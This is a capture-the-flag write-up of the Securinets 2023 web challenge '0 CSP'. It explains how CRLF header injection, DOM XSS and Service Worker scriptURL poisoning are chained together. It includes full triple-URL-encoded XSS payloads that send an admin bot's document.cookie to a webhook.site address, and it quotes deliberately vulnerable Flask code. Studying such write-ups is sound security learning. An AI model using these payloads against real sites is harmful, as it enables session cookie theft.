siunam's Website

My personal website

Home Writeups Research Blog Projects About

0 CSP

Table of Contents

  1. Overview
  2. Background
  3. Enumeration
  4. Exploitation
  5. Conclusion
  6. Update

Overview

Background

Flag in admin cookie… Good luck!

Challenge Link: escape.nzeros.me

Enumeration

Home page:

In here, there are 2 pages: "Hello World" and "Securinets".

"Hello World" page:

Burp Suite's HTTP history:

View souce page:

[...]
    <script>
        const endpointUrl = 'https://testnos.e-health.software/GetToken';

        fetch(endpointUrl)
            .then(response => {
                if (!response.ok) {
                    throw new Error(`Network response was not ok: ${response.status}`);
                }
                return response.json();
            })
            .then(data => {
                console.log('Parsed JSON data:', data);
                var token = data['token']
                var user = data['user']
                //const clean = DOMPurify.sanitize(user)
                document.body.innerHTML = "hey " + user + " this is your token: " + token
            })
            .catch(error => {
                console.error('Fetch error:', error);
            });

    </script>
[...]

When we go to GET route /helloworld, it'll first send a CORS (Cross-Origin Resource Sharing) preflight request (OPTIONS method). Basically CORS preflight request is a CORS request that checking the target host (testnos.e-health.software) allows or denies CORS requests.

Then, after the preflight request was done and the target URL allows CORS requests, it'll send a GET request to host testnos.e-health.software with GET parameter userid, with value stranger. If nothing goes wrong, it'll response back a JSON data: {"token":"zSf9VrdkupH3","user":"stranger"}.

Next, it'll send a GET request to /sw.js to host escape.nzeros.me, with GET parameter user value stranger.

The JSON data will be inserted into the <body> element using DOM (Document Object Model)'s innerHTML (sink). However, looks like the user variable DOES NOT get sanitized via DOMPurify library.

Note: DOMPurify is a JavaScript library that sanitizes HTML, MathML and SVG, which will then prevent XSS (Cross-Site Scripting) attacks.

Hmm… Maybe we can exploit DOM-based XSS via user variable (source)??

Note: Source is referring to attacker's controlled variable, sink is a dangerous JavaScript function. In this case, user variable will be the source, innerHTML will be the sink.

"Securinets" page:

Burp Suite's HTTP history:

Same as "Hello World" page? (I'll explain this later.)

"Network" in Firefox's development tool:

View source page:

[...]
    <script>
        const endpointUrl = 'https://testnos.e-health.software/securinets';

        fetch(endpointUrl)
            .then(response => {
                if (!response.ok) {
                    throw new Error(`Network response was not ok: ${response.status}`);
                }
                return response.json();
            })
            .then(data => {
                console.log('Parsed JSON data:', data);
                var paragraphElement = document.createElement('p');
                var text = data['message']
                //purify text
                const clean = DOMPurify.sanitize(text)
                var textNode = document.createTextNode(clean);
                paragraphElement.appendChild(textNode);
                document.body.appendChild(paragraphElement);
            })
            .catch(error => {
                console.error('Fetch error:', error);
            });

    </script>
[...]

It looks almost the same as the "Hello World" page, this time however, the sink (text) is being sanitized by DOMPurify… So no XSS in here.

In this challenge, we can download a file:

┌[siunam♥Mercury]-(~/ctf/Securinets-CTF-Quals-2023/Web-Exploitation/0-CSP)-[2023.08.07|11:14:44(HKT)]
└> file app.py 
app.py: Python script, ASCII text executable

app.py:

import os
import re
from flask import Flask, request, jsonify, escape
import random
import string

import requests

app = Flask(__name__)
url = os.environ.get("URL_BOT")

user_tokens = {}
headers = {
    'Access-Control-Allow-Origin': '*',
    'Access-Control-Allow-Methods': 'POST, GET, OPTIONS',
    'Access-Control-Allow-Headers': ' *',
    'Access-Control-Max-Age': '3600',
}


def use_regex(input_text):
    pattern = re.compile(r"https://escape.nzeros.me/", re.IGNORECASE)
    return pattern.match(input_text)


def generate_token():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=12))




@app.route('/reporturl', methods=['POST', 'OPTIONS'])
def report():
    if request.method == "OPTIONS":
        return '', 200, headers
    if request.method == "POST":
        link = request.form['link']
        if not use_regex(link):
            return "wrong url format", 200, headers

        obj = {'url': link}
        # send to bot
        x = requests.post(url, json=obj)
        if (x.content == b'OK'):
            return "success!", 200, headers

    return "failed to visit", 200, headers


@app.route('/GetToken', methods=['GET', 'OPTIONS'])
def get_token():

    if request.method == "OPTIONS":
        return '', 200, headers

    try:
        new_header: dict[str, str | bytes] = dict(headers)
        userid = request.args.get("userid")

        if not userid:
            return jsonify({'error': 'Missing userid'}), 400, headers

        if userid in user_tokens:
            token = user_tokens[userid]
        else:
            token = generate_token()
            user_tokens[userid] = token
        new_header["Auth-Token-" +
                   userid] = token

        return jsonify({'token': token, 'user': str(escape(userid))[:110]}), 200, new_header

    except Exception as e:
        return jsonify({'error': f'Something went wrong {e}'}), 500, headers


@app.route('/securinets', methods=['GET', 'OPTIONS'])
def securinets():

    if request.method == "OPTIONS":
        return "", 200, headers
    token = None
    for key, value in request.headers.items():
        if 'Auth-Token-' in key:
            token_name = key[len('Auth-Token-'):]
            token = request.headers.get('Auth-Token-'+token_name)

    if not token:
        return jsonify({'error': 'Missing Auth-Token header', }), 401, headers

    if token in user_tokens.values():
        return jsonify({'message': f'Welcome to Securinets. {token_name}'}), 200, headers
    else:
        return jsonify({'error': 'Invalid token or user not found'}), 403, headers


if __name__ == '__main__':
    app.run(host="0.0.0.0", port="5000", debug=False)

In here, we can see that there are a few routes:

Another weird thing I've noticed is that the /reporturl's regular expression pattern is flawed:

pattern = re.compile(r"https://escape.nzeros.me/", re.IGNORECASE)

Those . are not escaped (It should be \.), so if we can purchase a domain like escape-nzeros.me, it'll pass the regular expression check, because . is regular expression means matching any characters.

However, I don't think that's the right path, as I believe no CTFs will require you to buy a domain in order to complete the challenge? Like, what if all possible domains are purchased by the players? XD

Anyway, the /GetToken route is actually escaping the userid in response header Auth-Token-<userid>: <token>. Hmm… Looks like we can only perform XSS in token because it's not escaped at all??

Note: Please be reminded that this app.py is running on host testnos.e-health.software, NOT escape.nzeros.me. (You can tell that because of the missing /helloworld route.)

Exploitation

So, maybe we can inject arbitrary response header via Auth-Token-<userid>? This is because userid is controlled by us:

After fumbling around, we can do that via CRLF (Carriage Return (\r, %0d in URL encoding), Line Feed (\n, %0a in URL encoding), aka a new line character) injection:

But… What can we do with CRLF injection??

If you learned a little bit HTTP request smuggling, you'll know that by providing 2 CRLFs, you'll end the response header. After that, you can provide the actual response data:

Ah ha! Now we can overwrite the token's value, so that it'll contain our evil XSS payload!

Note: I messed up with the JSON data, it should be {"token":"<img src=errorpls onerror=alert(document.domain)>"} XD

However, it still contains the real user token JSON data…

To solve this, we can overwrite the Content-Length response header!

Get the XSS payload's length:

┌[siunam♥Mercury]-(~/ctf/Securinets-CTF-Quals-2023/Web-Exploitation/0-CSP)-[2023.08.07|12:23:23(HKT)]
└> python3
[...]
>>> xssPayload = '''{"token", "<img src=errorpls onerror=alert(document.domain)"}'''
>>> len(xssPayload)
61

Update: Umm… Actually you don't need to inject the Content-Length response header, this is my mistake, see ## Update.

Nice! We can intercept the /GetToken route's request and modify the userid GET parameter's value to the XSS payload in /helloworld route in host escape.nzeros.me:

/GetToken?userid=overwriteUserid%3a%20foobar%0d%0aContent-Length%3a%2061%0d%0a%0d%0a%7b%22token%22%3a%22%3cimg%20src%3derrorpls%20onerror%3dalert(document.domain)%3e%22%7d

Then I waited for a few minutes:

What?? The Content-Length response header should do the job right?

Eventually, I retried a bunch of times, and the XSS payload did worked:

However, we got a big problem: How can we deliver this XSS payload to the bot on host escape.nzeros.me? If we can't, it's just a self-XSS

Then, I wonder what's that sw.js JavaScript file doing in /helloworld and /securinets route…

In the home page (/), we can view the source page:

[...]
  <script>

    const ServiceWorkerReg = async () => {
      console.log("[ServiceWorkerReg] enter")
      if ('serviceWorker' in navigator) {
        console.log("[ServiceWorkerReg] serviceworker in navigator")
        try {
          const params = new URLSearchParams(window.location.search);
          console.log("[ServiceWorkerReg] registering")

          const reg = await navigator.serviceWorker.register(
            `sw.js?user=${params.get("user") ?? 'stranger'}`,
            {
              scope: './',
            }
          );
          loaded = true;
          console.log("[ServiceWorkerReg] registered")
          console.log(reg)
          if (reg.installing) {
            console.log('Service worker installing');
          } else if (reg.waiting) {
            console.log('Service worker installed');
          } else if (reg.active) {
            console.log('Service worker active');
          }
        } catch (error) {
          console.error(`Registration failed with ${error}`);
        }
      }
      else {
        console.log("browser doesn't support sw")
      }
    };

    console.log("app.js")
    ServiceWorkerReg();
    var loaded;
  </script>
  <!-- <script type="module" src="app.js"></script> -->
[...]

This JavaScript will check serviceWorker exists in navigator object. Then, if it exists, find the GET parameter user's value, register a new Service Worker to sw.js?user=<user>. If not found, the default value will be stranger.

Wait, hold up… What's Service Worker (SW) in JavaScript?? I never heard that before.

So, after some research, we know that JavaScript is a single-threaded programming language, in order to increase the client-side performance, Service Worker API is introduced.

Service Worker API will run on a different thread, so that when JavaScript is running, Service Worker will also run at the same time. Also, Service Worker is an event-driven worker, and it can do a lot of caching.

The process of having a Service Worker on the client-side is:

  1. Registration
  2. Download
  3. Install
  4. Activate

In our case, the Service Worker will do the above processes in /:

With the above information, let's read the sw.js JavaScript code!

Since Service Worker is an event-driven worker, we can just focus on the fetch event listener:

const params = new URLSearchParams(self.location.search)
const userId = params.get("user")
const serverURL = `https://testnos.e-health.software/GetToken?userid=${userId}`;
async function getToken() {
  const myHeaders = new Headers();
  myHeaders.append('Content-Type', 'application/json');


  const myRequest = new Request(serverURL, {
    method: 'GET',
    headers: myHeaders,
  });

  try {
    const response = await fetch(myRequest);

    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
    const responseFromCache = await caches.match(myRequest);

    if (responseFromCache) {
      const data = await responseFromCache.json();
      return data.token;
    }
    putInCache(myRequest, response.clone())
    const data = await response.json();
    return data.token;
  } catch (error) {
    console.error('Error fetching token:', error.message);
    return null;
  }
}
[...]
const cacheFirst = async ({ request, preloadResponsePromise, fallbackUrl }) => {
  if ((request.url.indexOf('http') === -1)) return;
  const responseFromCache = await caches.match(request);
  if (responseFromCache) {
    return responseFromCache;
  }

  const preloadResponse = await preloadResponsePromise;
  if (preloadResponse) {

    console.info('using preload response', preloadResponse);
    putInCache(request, preloadResponse.clone());
    return preloadResponse;
  }

  try {

    const token = await getToken()
    const responseFromNetwork = await fetchDataWithToken(token, request.clone());
    putInCache(request, responseFromNetwork.clone());
    return responseFromNetwork;

  } catch (error) {
    console.log(error)
    const fallbackResponse = await caches.match(fallbackUrl);
    if (fallbackResponse) {
      return fallbackResponse;
    }
    return new Response('Network error happened', {
      status: 408,
      headers: { 'Content-Type': 'text/plain' },
    });
  }
};
[...]
self.addEventListener('fetch', (event) => {
  let req = null
  if (event.request.url.endsWith('/GetToken')) {
    req = new Request(serverURL, event.request)
  }

  event.respondWith(
    cacheFirst({
      request: req ?? event.request,
      preloadResponsePromise: event.preloadResponse,
      fallbackUrl: './securinets.png',
    })
  );
});

When there's a fetch() method is being called, it'll:

Hmm… What can we do with caching… Maybe web cache poisoning in Service Worker?

After poking around at the navigator.serviceWorker, I found the scriptURL property:

According to mdn web docs, scriptURL property is the ServiceWorker serialized script URL defined as part of ServiceWorkerRegistration. It must be on the same origin as the document that registers the ServiceWorker.

So, if we register a Service Worker that has user GET parameter, we can control the fetch() method's /GetToken's userid GET parameter's value??

Note: Remember to hard refresh (Ctrl + Shift + R) in order to register the Service Worker again.

Ah ha!! That being said, we can really deliver our XSS payload to the bot via poisoning the Service Worker's scriptURL property.

Let's test it!

Wait a minute… Where's our CRLF characters???

After fumbling around, it seems like scriptURL property will URL decode the first layer??

To fix this, we can just double URL encode it:

So the registration URL will be:

/?user=overwriteUserid%253a%2520foobar%250d%250aContent-Length%253a%252061%250d%250a%250d%250a%257b%2522token%2522%253a%2522%253cimg%2520src%253derrorpls%2520onerror%253dalert(document.domain)%253e%2522%257d

Then go to /helloworld to test the XSS payload:

Ah of course… The fetch() event listener will URL decode it again…

Let's just triple URL encode the payload…

/?user=overwriteUserid%25253a%252520foobar%25250d%25250aContent-Length%25253a%25252061%25250d%25250a%25250d%25250a%25257b%252522token%252522%25253a%252522%25253cimg%252520src%25253derrorpls%252520onerror%25253dalert(document.domain)%25253e%252522%25257d

However, the weird response time is driven me nuts lmao, and I can't test is the XSS payload working or not. (Update: It's because of the injected Content-Length response header…)

After the CTF ended

So, after some resting, I found that we can just test the payload by sending the registration XSS payload to the bot.

So, our exploitation processes will be:

  1. Send a link that contains our XSS payload in / via user GET parameter, this will register the Service Worker
  2. Send a link to /helloworld route

Since Service Worker will running at the background, it doesn't care if the page is closed, our evil registered Service Worker will still stay there!

It's worth noting that if the XSS payload is using fetch(), it won't reach to our intended endpoint:

{"token":"<img src=errorpls onerror=fetch('https://webhook.site/[...]')>"}

If you recalled correctly, the Service Worker is listening the fetch() method, and it'll send the request to host testnos.e-health.software's /GetToken route instead of our intended endpoint!

To "bypass" the fetch() method, we can simply use the location.href property, which redirects user:

{"token":"<img src=errorpls onerror=location.href='//webhook.site/[...]'>"}

Note: Kudos to my teammate "josefk" and the writeup author "xanhacks" for this location.href trick!

After sending the registration XSS payload to the bot and spamming the weird response time in /helloworld route, it worked!!

Let's go!! Now it's confirmed that we can poison the Service Worker's scriptURL property, and deliver our XSS payload to the bot!

Let's modify the XSS payload to retrieve the flag from the admin bot's cookie!

{"token":"<img src=errorpls onerror=location.href='//webhook.site/26e56a2a-016e-454e-87f6-4080f4c6f444?flag='.concat(document.cookie)>"}
>>> xssPayload = '''{"token":"<img src=errorpls onerror=location.href='//webhook.site/26e56a2a-016e-454e-87f6-4080f4c6f444?flag='.concat(document.cookie)>"}'''
>>> len(xssPayload)
136

Registration XSS payload:

overwriteUserid: foobar\r\n
Content-Length: 136\r\n
\r\n
{"token":"<img src=errorpls onerror=location.href='//webhook.site/26e56a2a-016e-454e-87f6-4080f4c6f444?flag='.concat(document.cookie)>"}

Triple URL encoded registration XSS payload:

overwriteUserid%25253a%252520foobar%25250d%25250aContent-Length%25253a%252520136%25250d%25250a%25250d%25250a%25257b%252522token%252522%25253a%252522%25253cimg%252520src%25253derrorpls%252520onerror%25253dlocation.href%25253d'%25252f%25252fwebhook.site%25252f26e56a2a-016e-454e-87f6-4080f4c6f444%25253fflag%25253d'.concat(document.cookie)%25253e%252522%25257d

Send the triple URL encoded registration XSS payload to the bot:

https://escape.nzeros.me/?user=overwriteUserid%25253a%252520foobar%25250d%25250aContent-Length%25253a%252520136%25250d%25250a%25250d%25250a%25257b%252522token%252522%25253a%252522%25253cimg%252520src%25253derrorpls%252520onerror%25253dlocation.href%25253d'%25252f%25252fwebhook.site%25252f26e56a2a-016e-454e-87f6-4080f4c6f444%25253fflag%25253d'.concat(document.cookie)%25253e%252522%25257d

Send the /helloworld route URL to the bot:

https://escape.nzeros.me/helloworld

Update

Update: I figured out if you injected the Content-Length response header, it'll actually excepted to wait for more bytes, that explains why there's a weird response time.

If you pay attention to the injected JSON XSS payload, you'll see the original Content-Length response header:

Currently it's 149. What if I add more characters?

It's still 149!! That being said, the Content-Length response header's value is fixed!

Hence, the final payload will be:

overwriteUserid: foobar\r\n
\r\n
{"token":"<img src=errorpls onerror=location.href='//webhook.site/26e56a2a-016e-454e-87f6-4080f4c6f444?flag='.concat(document.cookie)>aaaaaaaaaaaaa"}

No more weird response time!

Profit:

Conclusion

What we've learned:

  1. Exploiting web cache poisoning in JavaScript's Service Worker to deliver XSS payload